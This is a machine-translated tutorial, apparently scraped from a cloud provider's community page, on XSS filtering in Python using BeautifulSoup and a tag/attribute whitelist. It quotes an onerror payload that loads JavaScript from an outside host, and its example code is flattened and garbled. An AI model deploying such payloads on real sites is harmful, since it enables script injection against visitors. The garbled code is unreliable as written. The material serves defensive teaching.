Python implements XSS filtering (BeautifulSoup and whitelist processing)

Source: Internet
Author: User
Tags html form html interpreter

Below I do the inexplicable code formatting is because of this--。 --

The first thing to say about XSS is to insert malicious JavaScript code into HTML, which makes it possible to execute malicious code when the HTML is loaded to achieve the purpose of the attack.

Where possible, it is possible to generate XSS as long as the user can input it, including an editor like the blog Park, which can see the input form HTML.

Here is the filter of the blog park. (Note the last line)

Of course, not only these words, such as  These <tag on*=*/> events, or the following "diehard method" <script src= "JS address" ></ Script>.

You can even load external JS dynamically using images.

onerror= 'var s=document.createelement ("script"); s.src= "http:// Xsst.sinaapp.com/m.js ";(d ocument.body| | document.documentelement). appendchild (s);' />

Well, when we look back at these ways, we can find a few labels or attributes that are particularly conspicuous.

<script>, <src>, <on*> events,

Then we can set only allow a few tags to pass. (The blacklist is not safe, after all, only you can't imagine.) No one else could do that. )

The following is how to filter, now may be directly thought of, with regular expressions, which of course, it is more difficult to design, then we first use BeautifulSoup to deal with HTML, and then to filter sensitive tags.

Content= "" "<p class= ' C1 ' id= ' I1 ' > Asdfaa<span style="Font-family:nsimsun;">sdf<a>a</a>sdf</span>sdf</p><p> <strong class= ' C2 ' id= ' i2 ' >asdf</ Strong> <script>alert (123) </script></p>"""# This is a safe label, and it also specifies a security attribute. Tags= {    ' P ': [' class '],    ' Strong ': [' ID ',]} From BS4 import Beautifulsoupsoup= BeautifulSoup (content, ' Html.parser ') # BeautifulSoup's own HTML interpreter forTaginchSoup.find_all ():ifTag.nameinchTags:passElse: Tag.hidden=True # Hides the tag tag.clear () # Delete the contents of the tagContinue# All attributes of user submitted data Input_attrs= tag.attrs # {' Class ': ' C1 ', ' id ': ' i1 '} dictionary Valid_attrs= Tags[tag.name] #[' class '] List # Input_attrs.keys () generates an iterator # note the following notation, in which a key-value pair in the dictionary cannot be deleted because it destroys the iterator.  forKinchlist (Input_attrs.keys ()):ifKinchValid_attrs:passElse: # Delete One of the properties of a tag del tag.attrs[k]# decode is in HTML form. Content=Soup.decode () print (content)

Python implements XSS filtering (BeautifulSoup and whitelist processing)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.